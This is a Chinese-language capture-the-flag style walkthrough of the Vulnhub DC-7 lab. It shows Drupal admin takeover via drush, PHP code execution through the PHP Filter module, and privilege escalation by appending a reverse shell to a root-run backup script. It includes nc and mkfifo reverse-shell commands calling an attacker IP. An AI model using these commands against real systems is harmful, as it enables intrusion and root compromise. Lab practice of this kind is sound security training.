zoukankan      html  css  js  c++  java
  • Vulnhub实战靶场:DC-7

    一、环境搭建

    1、官网下载连接:https://www.vulnhub.com/entry/dc-7,356/

    2、下载之后,使用Oracle VM VirtualBox导入靶场环境

    3、为了正常练习,将靶场的网卡模式设置为桥接模式,启动即可

    二、靶场攻略

    1、惯例,使用命令:nmap -sP --min-hostgroup 1024 --min-parallelism 1024 10.10.114.0/24,快速探测存活主机,找到靶场ip

     2、探测启动的服务端口:nmap -A -p- 10.10.114.87

     

     3、访问端口,看到首页提示,暴力破解不能用,尝试登录失败五次会锁定,msf中直接打的exp也没打进去

    4、按照官网提示,可以在google里得到帮助,关键字跟网站下@DC7USER一样,就搜索了一下这个人

     发现了github账户,账户下有网站源码文件,里面有配置文件信息

     尝试登录网站发现不对

     尝试登录ssh,原来是ssh的账号密码

     5、使用命令ls,查看到有一个邮件

     查看邮件,发现几个关键脚本文件

     查看backups.sh文件,是一个定时root执行的备份文件的脚本

     drush是对密码进行操作的命令

     知道有admin账户,所以修改密码,输入命令:drush user-password  admin --password="nihao123!"

     重新去登录网站,登录成功

     6、打开管理页面去安装一个PHP扩展方便写入木马,扩展程序下载连接为:https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz,下载完成之后,到管理的扩展界面,安装新插件即可

    安装完成之后,多出了一个PHP Filter

     启动扩展之后,到编辑菜单,编辑首页内容,内容代码选择php code,之后在内容中加入<?php phpinfo();?>,发现成功执行

     

     7、在文本中,写入要执行的反弹shell的命令:<?php system('nc -e /bin/bash 10.10.114.76 2345');>,kali攻击机使用nc接收之后,顺利拿到www账户的shell

    再使用命令:python -c "import pty;pty.spawn('/bin/bash')",拿到www权限的交互shell

     8、到备份脚本的页面,查看权限,知道只有root和www账户有对自动运行的backups.sh脚本有编辑权限

     使用命令:echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.114.76 3456 >/tmp/f" >> backups.sh,将反弹shell的命令,写入到backups.sh中

    等一段时间,备份脚本以root账户自动执行之后,顺利拿到root权限的shell,得到flag

     完

  • 相关阅读:
    搞清楚C#中的值类型(基础类型)和引用类型
    构造动态SQL语句
    Json.net API及常用方法
    泛型代码中的default有何作用
    SQL 中的for xml path()的使用
    fastJosn和JackJson的区别
    箭头函数
    3篇文章初探MVC工作流程
    MVC传递Model之TempData、ViewData、ViewBag区别和用途
    .Net 提交页面,js修改的Label值会丢掉
  • 原文地址:https://www.cnblogs.com/sym945/p/13926313.html
Copyright © 2011-2022 走看看